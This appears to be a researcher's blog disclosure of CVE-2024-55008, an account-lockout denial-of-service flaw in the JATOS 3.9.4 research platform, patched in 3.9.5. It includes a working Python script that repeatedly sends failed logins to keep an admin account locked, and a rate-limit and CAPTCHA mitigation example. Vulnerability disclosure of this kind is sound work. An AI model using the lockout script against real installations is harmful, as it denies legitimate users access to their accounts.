CVE-2024-55008 | JATOS v3.9.4 Account Lockout Denial-of-Service
Introduction to CVE-2024-55008
CVE-2024-55008 exposes a critical vulnerability in the application's authentication system, presenting a significant risk to user accessibility and operational integrity. This account-level denial-of-service (DoS) flaw allows attackers to lock any user account, including administrator accounts, by triggering the lockout mechanism through multiple failed login attempts. This can prevent legitimate users from accessing their accounts indefinitely, disrupting functionality and potentially impacting critical operations.
What is JATOS?
JATOS is a powerful web-based platform designed to conduct psychological experiments and surveys online. It enables researchers to create, distribute, and gather data from participants in a controlled environment, making it a versatile tool in the field of psychological research.
The platform boasts a user-friendly interface that allows researchers to set up experiments without requiring extensive programming knowledge, making it accessible to a broader audience. Additionally, JATOS supports multi-platform usage, enabling experiments to be run on various devices, including computers, tablets, and smartphones, which significantly expands participant reach.
One of the standout features of JATOS is its real-time data collection capability, which allows researchers to gather and analyze results efficiently. It also offers integration with other tools and platforms, providing flexibility in experimental design. As an open-source software, JATOS allows researchers to customize the platform according to their specific needs, further enhancing its utility.
JATOS was developed by Kristian Lange and Elisa Filevich, who aimed to create an effective solution for online research. When I spoke with Kristian, he made me understand that he is currently the only developer still maintaining JATOS. This is particularly impressive given the extensive capabilities of the platform and the demands of ongoing development and support. It's an amazing achievement for a solo developer to sustain such a robust and widely used tool in the research community.
I want to highlight that, thanks to the excellent collaboration with Kristian, the issues identified in this blog article have been successfully patched in version 3.9.5.
Exploitation Phase
Now that we understand the authentication system vulnerability, let’s delve into the specifics of this CVE and explore how an attacker might exploit it. We’ll begin with a simple attack scenario and then present a practical use case where this vulnerability could disrupt an administrator’s access indefinitely.
Simple Exploitation
To exploit this account-level denial-of-service (DoS) vulnerability, an attacker needs only to send three failed login attempts to a targeted user account. This triggers the lockout mechanism, which temporarily blocks login attempts for the affected account. By automating this process and repeating it every minute, the lockout timer resets continuously, effectively preventing the legitimate user from accessing their account indefinitely.
Practical Use Case
An attacker could target a privileged user, such as an administrator, to disrupt system operations. By automating failed login attempts with a simple script or tool, the attacker ensures the administrator account remains persistently locked out, preventing the admin from performing critical tasks.
This issue arises because the lockout mechanism is tied to the user account being authenticated rather than to the source IP address of the failed attempts. As a result, the account remains inaccessible even to the legitimate user, regardless of their device or IP. This design flaw enables any attacker with access to the login page to repeatedly lock out any user account, creating a denial-of-service scenario without requiring elevated privileges.
```python
import requests
import threading

# Local sign-in endpoint of the JATOS instance under test and a deliberately
# wrong password for the account whose lockout is being triggered
url = "http://127.0.0.1:9000/jatos/signin/local"
payload = {"username": "admin", "password": "admin1"}
stop = threading.Event()


def send_requests():
    # Three failed logins trigger the lockout; repeating them every 61 seconds
    # keeps resetting the lockout timer
    while not stop.is_set():
        for _ in range(3):
            try:
                response = requests.post(url, data=payload)
                print(f"Status Code: {response.status_code}")
                print(f"HTML Content:\n{response.text[:500]}")
            except Exception as e:
                print(f"Error: {e}")
        stop.wait(61)  # returns early once the script is told to stop


thread = threading.Thread(target=send_requests)
thread.start()
input("Press Enter to stop...\n")
stop.set()
thread.join()
print("Script stopped.")
```
This issue can be effectively mitigated by implementing measures that reduce the risk of exploitation while maintaining accessibility for legitimate users. For instance:
- Implementing rate limits based on the source IP address can restrict the number of login attempts an attacker can make within a given timeframe, thereby preventing automated abuse.
- Introducing a CAPTCHA after a certain number of failed login attempts adds an additional layer of security by ensuring that only human users can proceed, significantly reducing the likelihood of automated scripts perpetuating the attack.
By combining these approaches, the system can maintain a balance between security and usability, safeguarding user accounts from persistent lockout attacks.
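The following is an added illustration of the two mitigations above, written for this article; it is not JATOS code and does not reflect how the 3.9.5 fix was implemented. The `LoginGuard` class, its thresholds and the sample IP addresses are assumptions chosen for the demonstration. The guard throttles attempts per source IP with a sliding window and, once an account has accumulated a few failures, demands a solved CAPTCHA on the next attempt instead of locking the account, so the real owner keeps a way in while the bot from the proof of concept is stopped.

```python
from collections import defaultdict, deque
from typing import Callable, Deque, Dict
import time

ALLOW = "allow"
RATE_LIMITED = "rate_limited"
CAPTCHA_REQUIRED = "captcha_required"


class LoginGuard:
    """Gate to run before password verification (hypothetical helper).

    Two independent controls:
      * per source IP: at most `ip_limit` attempts per `ip_window` seconds
        (sliding window), so an automated script from one address is throttled;
      * per account: after `captcha_after` consecutive failures the next
        attempt must carry a solved CAPTCHA; the account is never hard-locked,
        so an attacker cannot deny the legitimate user access indefinitely.
    """

    def __init__(self, ip_limit: int = 10, ip_window: float = 60.0,
                 captcha_after: int = 3,
                 clock: Callable[[], float] = time.monotonic):
        self.ip_limit = ip_limit
        self.ip_window = ip_window
        self.captcha_after = captcha_after
        self.clock = clock  # injectable so the demo can use a fake clock
        self._ip_attempts: Dict[str, Deque[float]] = defaultdict(deque)
        self._failures: Dict[str, int] = defaultdict(int)

    def check(self, ip: str, username: str, captcha_ok: bool = False) -> str:
        now = self.clock()
        window = self._ip_attempts[ip]
        # Discard attempts that have fallen out of the sliding window
        while window and now - window[0] >= self.ip_window:
            window.popleft()
        if len(window) >= self.ip_limit:
            return RATE_LIMITED  # rejected before it can count against the account
        window.append(now)
        if self._failures[username] >= self.captcha_after and not captcha_ok:
            return CAPTCHA_REQUIRED
        return ALLOW

    def record_failure(self, username: str) -> None:
        self._failures[username] += 1

    def record_success(self, username: str) -> None:
        self._failures[username] = 0


def demo() -> Dict[str, object]:
    """Replay the PoC pattern (three wrong passwords per minute) against a fake
    clock and show that the legitimate admin still signs in. The IPs and the
    'admin' account are constructed sample values."""
    now = [0.0]
    guard = LoginGuard(ip_limit=6, ip_window=60.0, captcha_after=3,
                       clock=lambda: now[0])
    attacker, admin_ip = "203.0.113.5", "198.51.100.7"
    results: Dict[str, object] = {}

    # First burst: three wrong passwords reach verification and are counted
    first_burst = []
    for _ in range(3):
        verdict = guard.check(attacker, "admin")
        if verdict == ALLOW:
            guard.record_failure("admin")  # password was wrong
        first_burst.append(verdict)
    results["first_burst"] = first_burst

    # Fourth bot attempt: the account now demands a CAPTCHA, not a lockout
    results["bot_after_threshold"] = guard.check(attacker, "admin")

    # The real admin, from another address, solves the CAPTCHA and signs in
    verdict = guard.check(admin_ip, "admin", captcha_ok=True)
    if verdict == ALLOW:
        guard.record_success("admin")  # correct password resets the counter
    results["admin_with_captcha"] = verdict

    # Bot keeps hammering inside the same minute: the per-IP limit trips
    now[0] = 30.0
    hammering = []
    for _ in range(5):
        verdict = guard.check(attacker, "admin")
        if verdict == ALLOW:
            guard.record_failure("admin")
        hammering.append(verdict)
    results["bot_hammering"] = hammering

    # A minute later the oldest attempts leave the window; the IP is not
    # permanently banned, only slowed down
    now[0] = 61.0
    results["after_window"] = guard.check(attacker, "admin")
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Rate-limited attempts return before the account counter is touched, so a flood from one address cannot push the account into the CAPTCHA state faster than the per-IP budget allows; and because the account state is a CAPTCHA step-up rather than a lock, the worst an attacker can impose on the legitimate user is one extra challenge at sign-in.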
Other References
For the latest updates on my developments and research, be sure to check out my GitHub profile.